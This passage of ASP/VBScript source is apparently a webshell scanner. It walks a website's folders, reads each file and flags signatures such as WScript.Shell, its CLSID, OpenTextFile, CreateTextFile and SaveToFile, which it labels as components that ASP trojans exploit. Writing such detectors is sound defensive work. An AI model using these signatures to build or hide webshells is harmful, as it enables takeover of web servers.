Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "\.(Open|Create)TextFile\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "\.SaveToFile\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "\.Save\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If Set regEx = Nothing Set regEx = New RegExp regEx.IgnoreCase = True regEx.Global = True regEx.Pattern = "

Scan WebShell -- 十三优化版

" RRS "

" RRS "扫描完毕！一共检查文件夹"&SumFolders&"个，文件"&SumFiles&"个，发现可疑点"&Sun&"个" RRS "" If request.Form("radiobutton") = "sws" Then RRS "" RRS "" RRS "" RRS "" else RRS "" RRS "" RRS "" end if RRS "" RRS Report RRS "

文件相对路径

特征码

描述

创建/修改时间

文件相对路径

文件创建时间

修改时间

" timer2 = timer thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10) RRS "
本页执行共用了"&thetime&"毫秒" end if Sub ShowAllFile(Path) Set F1SO = CreateObject("Scripting.FileSystemObject") if not F1SO.FolderExists(path) then exit sub Set f = F1SO.GetFolder(Path) Set fc2 = f.files For Each myfile in fc2 If CheckExt(F1SO.GetExtensionName(path&"\"&myfile.name)) Then Call ScanFile(Path&Temp&"\"&myfile.name, "") SumFiles = SumFiles + 1 End If Next Set fc = f.SubFolders For Each f1 in fc ShowAllFile path&"\"&f1.name SumFolders = SumFolders + 1 Next Set F1SO = Nothing End Sub Sub ScanFile(FilePath, InFile) Server.ScriptTimeout=999999999 If InFile <> "" Then Infiles = "该文件被"& InFile & "文件包含执行" End If Set FSO1s = CreateObject("Scripting.FileSystemObject") on error resume next set ofile = FSO1s.OpenTextFile(FilePath) filetxt = Lcase(ofile.readall()) If err Then Exit Sub end if if len(filetxt)>0 then filetxt = vbcrlf & filetxt temp = ""&replace(FilePath,server.MapPath("\")&"\","",1,1,1)&"
" temp=temp&"Edit " temp=temp&"Del " temp=temp&"Copy " temp=temp&"Move" If instr( filetxt, Lcase("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then Report = Report&"

"&temp&"

WScr"&DoMyBest&"ipt.Shell 或者 clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8

危险组件，一般被ASP木利用"&infiles&"